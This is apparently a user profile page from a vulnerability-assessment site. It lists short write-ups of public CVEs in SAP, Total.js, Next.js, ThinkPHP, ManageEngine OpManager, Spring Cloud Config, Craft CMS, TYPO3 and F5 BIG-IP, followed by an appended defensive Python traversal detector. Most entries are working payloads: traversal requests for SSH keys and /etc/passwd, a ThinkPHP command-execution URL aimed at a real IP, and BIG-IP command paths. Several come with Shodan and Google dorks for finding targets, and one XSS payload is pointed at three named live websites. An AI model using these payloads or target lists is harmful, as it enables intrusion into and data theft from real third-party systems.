Mad-robot (37)

Last Login: June 11, 2021
Assessments: 11
Score: 37

Mad-robot's Latest (11) Contributions

Ratings: 5
Technical Analysis

Description:-
SAP NetWeaver AS JAVA (LM Configuration Wizard), versions – 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system, leading to Missing Authentication Check.

POC
https://github.com/chipik/SAP_RECON/blob/master/RECON.py

Ratings: 2
Technical Analysis

Totaljs – Unauthenticated Directory Traversal

DESCRIPTION
User can make requests like “GET /../databases/settings.json HTTP/1.1” and include file contents from outside the /public directory, which is the default directory for accessible static files.

Refer:-
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903

PROOF OF CONCEPT

$ curl -v --path-as-is http://127.0.0.1:8000/.%2e/databases/settings.json

#(note that .json is in the extensions list by def.)

Ratings: 1
Technical Analysis

Totaljs – Unauthenticated Directory Traversal

DESCRIPTION
User can make requests like “GET /../databases/settings.json HTTP/1.1” and include file contents from outside the /public directory, which is the default directory for accessible static files.

Refer:-
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903

PROOF OF CONCEPT

$ curl -v --path-as-is http://127.0.0.1:8000/.%2e/databases/settings.json

#(note that .json is in the extensions list by def.)

Ratings: 3
Technical Analysis

Google dork:- inurl:/api/jsonws

Shodan:- Powered+By+Liferay

publicwww:-https://publicwww.com/websites/Powered+By+Liferay/

POC:-
https://github.com/mzer0one/CVE-2020-7961-POC

Ratings: 2
Technical Analysis

ThinkPHP RCE

DESCRIPTION

ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.

PROOF OF CONCEPT
The RCE (Remote Command Execution) vulnerability is triggered by an HTTP request. Successfully executed the command “whoami”.
poc:

http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Ratings: 1
Technical Analysis

Next.js Path traversal

DESCRIPTION

Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.

PROOF OF CONCEPT

HTTP://localhost/_next/static/../server/pages-manifest.json
Ratings: 3
Technical Analysis

Unauthenticated arbitrary file read on ManageEngine OpManager

DESCRIPTION

The latest release of OpManager contains a directory traversal vulnerability that allows unrestricted access to every file in the OpManager application. This includes private SSH keys, password protected Java keystores, and configuration files containing passwords to keystores, private certificates, and the backend database. If LDAP is configured then domain credentials can be obtained from “conf/OpManager/ldap.conf”.

PROOF OF CONCEPT
REQUEST:

GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: <HOSTNAME>:8060
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Cache-Control: max-age=0
Referer: http://<HOSTNAME>:8060/

RESPONSE:

HTTP/1.1 200 
Set-Cookie: JSESSIONID=4E221B342BC080BC9AC2D19378364E3B; Path=/; HttpOnly
X-FRAME-OPTIONS: DENY
Accept-Ranges: bytes
ETag: W/"902-1586033949624"
Last-Modified: Sat, 04 Apr 2020 20:59:09 GMT
Vary: Accept-Encoding
Date: Mon, 13 Apr 2020 15:40:01 GMT
Connection: close
Content-Length: 902

-----BEGIN RSA PRIVATE KEY-----
MIICX...pXqnO
-----END RSA PRIVATE KEY-----

Here are the files you can read

    "bin/.ssh_host_dsa_key",
    "bin/.ssh_host_dsa_key.pub",
    "bin/.ssh_host_rsa_key",
    "bin/.ssh_host_rsa_key.pub",
    "conf/client.keystore",
    "conf/customer-config.xml",
    "conf/database_params.conf",
    "conf/FirewallAnalyzer/aaa_auth-conf.xml",
    "conf/FirewallAnalyzer/auth-conf_ppm.xml",
    "conf/gateway.conf",
    "conf/itom.truststore",
    "conf/netflow/auth-conf.xml",
    "conf/netflow/server.xml",
    "conf/netflow/ssl_server.xml",
    "conf/NFAEE/cs_server.xml",
    "conf/OpManager/database_params.conf",
    "conf/OpManager/database_params_DE.conf",
    "conf/OpManager/ldap.conf",
    "conf/OpManager/MicrosoftSQL/database_params.conf",
    "conf/OpManager/POSTGRESQL/database_params.conf",
    "conf/OpManager/POSTGRESQL/database_params_DE.conf",
    "conf/OpManager/securitydbData.xml",
    "conf/OpManager/SnmpDefaultProperties.xml",
    "conf/Oputils/snmp/Community.xml",
    "conf/Persistence/DBconfig.xml",
    "conf/Persistence/persistence-configurations.xml",
    "conf/pmp/PMP_API.conf",
    "conf/pmp/pmp_server_cert.p12",
    "conf/product-config.xml",
    "conf/SANSeed.xml",
    "conf/server.keystore",
    "conf/server.xml",
    "conf/system_properties.conf",
    "conf/tomcat-users.xml",
    "lib/OPM_APNS_Cert.p12"
Ratings: 1
  • Attacker Value: Very High
  • Exploitability: Very High
Technical Analysis

Directory Traversal with spring-cloud-config-server

DESCRIPTION

Spring Cloud Config, 2.2.x versions before 2.2.3, 2.1.x versions before 2.1.9, and older unsupported versions allow applications to provide arbitrary configuration files through the spring-cloud-config-server module. Malicious users or attackers can use specially crafted URLs to send requests, which may lead to directory traversal attacks.

PROOF OF CONCEPT

http://127.0.0.1:8889/flag.txt%23/222/..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29tmp%28_%29

http://127.0.0.1:8889/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%252Fflag.txt%23/222/11

http://127.0.0.1:8889/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/222/11

Video POC

https://video.twimg.com/tweet_video/Eah0d6rVAAApHM_.mp4

Ratings: 1
Technical Analysis

Description-

The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.

POC-

HTTP://localhost/actions/seomatic/meta-container/meta-link-container/?uri={{7+'7'}}
HTTP://localhost/actions/seomatic/meta-container/all-meta-containers?uri={{7+'7'}}
Ratings: 1
  • Attacker Value: Medium
  • Exploitability: Very High
Technical Analysis

DESCRIPTION-

TYPO3 6.2.0 to 6.2.38 ELTS and TYPO3 7.0.0 to 7.1.0 (CVE-2020-8091). These versions embed a third-party component named SVG Web which provides svg.swf, a Flash file vulnerable to cross-site scripting.

Google Dork

inurl:"typo3/contrib/websvg"

Works on IE

PROOF OF CONCEPT-
Payload: svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert("XSS"),this.x=1}//

Live sites:

https://www.bulac.fr/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(%22XSS%22),this.x=1}//

www.roz.si/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(%22XSS%22),this.x=1}//

www.urbanek-consulting.com/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(%22XSS%22),this.x=1}//
Ratings: 6
Technical Analysis

CVE-2020-5902

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp

/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa

/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

Patch & Mitigation:-

<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>

Versions Affected

  • BIG-IP 15.x: 15.1.0/15.0.0
  • BIG-IP 14.x: 14.1.0 ~ 14.1.2
  • BIG-IP 13.x: 13.1.0 ~ 13.1.3
  • BIG-IP 12.x: 12.1.0 ~ 12.1.5
  • BIG-IP 11.x: 11.6.1 ~ 11.6.5

Dorks
https://beta.shodan.io/search?query=vuln%3Acve-2020-5902

https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22
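The traversal posts on this page (Totaljs, Next.js, OpManager, Spring Cloud Config and BIG-IP) all turn on a `..` segment that survives whatever lenient decoding the backend applies: a single `%2e`, a double-encoded `%252F`, Spring's `(_)` label separator, or a `;` path parameter that a servlet container silently drops. The Python below is an added example from the defender's side, not code from Mad-robot's posts or from any of the affected projects: a canonicaliser that undoes those encodings without collapsing dot segments, a `has_traversal` check that works on whole segments (so a benign name like `v1..v2` is not flagged), a `resolve_under` helper a static-file handler can use to refuse anything that would leave its root, and a scanner that runs the check over access-log lines. The log lines, IP addresses and root paths are constructed for the example; the request paths inside them reproduce the patterns quoted above.

```python
# Added example (not code from the original posts or from any project named
# on this page): canonicalise request paths the way a lenient backend would,
# flag '..' segments, resolve static files safely, and scan log lines.
import posixpath
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3   # enough to undo %252F -> %2F -> '/', but bounded


def canonical_segments(raw_path: str) -> list:
    """Split a request path into segments as a lenient backend might see it.

    - the query string is cut at the first raw '?', before any decoding
    - percent-decoding is repeated (bounded) so %2e and %252F are both undone
    - ';param' suffixes are dropped, since servlet containers ignore them
      ('login.jsp/..;/' is served as 'login.jsp/../')
    - Spring Cloud Config's '(_)' label separator is treated as a slash
    Dot segments are deliberately NOT collapsed here, so '..' stays visible.
    """
    path = raw_path.split('?', 1)[0]
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = re.sub(r';[^/]*', '', path)
    path = path.replace('(_)', '/')
    return [seg for seg in path.split('/') if seg not in ('', '.')]


def has_traversal(raw_path: str) -> bool:
    """True when any canonical segment is exactly '..'.

    Matching whole segments rather than the substring '..' keeps ordinary
    names such as 'v1..v2' from producing false positives.
    """
    return any(seg == '..' for seg in canonical_segments(raw_path))


def resolve_under(root: str, raw_path: str):
    """Map a request path to a file under root, or return None.

    Any '..' segment is rejected outright; the normalised absolute path is
    then also checked to still lie inside root (defence in depth, and the
    only guard that matters if the caller passes a relative root).
    """
    segments = canonical_segments(raw_path)
    if '..' in segments:
        return None
    root = posixpath.normpath(root)
    target = posixpath.normpath(posixpath.join(root, *segments))
    if posixpath.commonpath([root, target]) != root:
        return None
    return target


# Apache combined log format: client ip, then "METHOD path PROTOCOL" in quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"')


def scan_log(lines):
    """Return (client_ip, raw_path) for every request whose path traverses."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and has_traversal(m.group('path')):
            hits.append((m.group('ip'), m.group('path')))
    return hits


# Constructed sample log lines: the IPs (documentation range), timestamps and
# sizes are made up; the request paths follow the patterns quoted above.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Apr/2020:15:40:01 +0000] "GET /css/site.css HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '192.0.2.11 - - [13/Apr/2020:15:40:02 +0000] "GET /.%2e/databases/settings.json HTTP/1.1" 200 410 "-" "curl/7.68.0"',
    '192.0.2.12 - - [13/Apr/2020:15:40:03 +0000] "GET /_next/static/../server/pages-manifest.json HTTP/1.1" 200 1203 "-" "Mozilla/5.0"',
    '192.0.2.13 - - [13/Apr/2020:15:40:04 +0000] "GET /..%252F..%252F..%252Ftmp%252Fflag.txt%23/222/11 HTTP/1.1" 200 14 "-" "Mozilla/5.0"',
    '192.0.2.14 - - [13/Apr/2020:15:40:05 +0000] "GET /flag.txt%23/222/..%28_%29..%28_%29tmp%28_%29 HTTP/1.1" 200 14 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [13/Apr/2020:15:40:06 +0000] "GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.16 - - [13/Apr/2020:15:40:07 +0000] "GET /docs/v1..v2/changes.html HTTP/1.1" 200 777 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, path in scan_log(SAMPLE_LOG):
        print(f'traversal from {ip}: {path}')
    # A static-file handler would serve the first and refuse the second.
    print(resolve_under('/srv/app/public', '/css/site.css'))
    print(resolve_under('/srv/app/public', '/.%2e/databases/settings.json'))
```

Two design points are worth noting. Decoding is bounded rather than run to a fixed point, so a request padded with many layers of encoding cannot keep the loop busy, and three rounds are already one more than any pattern on this page needs. `resolve_under` refuses `..` before it ever touches the filesystem; the containment check after `normpath` is there for the case where a root is misconfigured or a future change lets a non-`..` segment escape, not as the primary control.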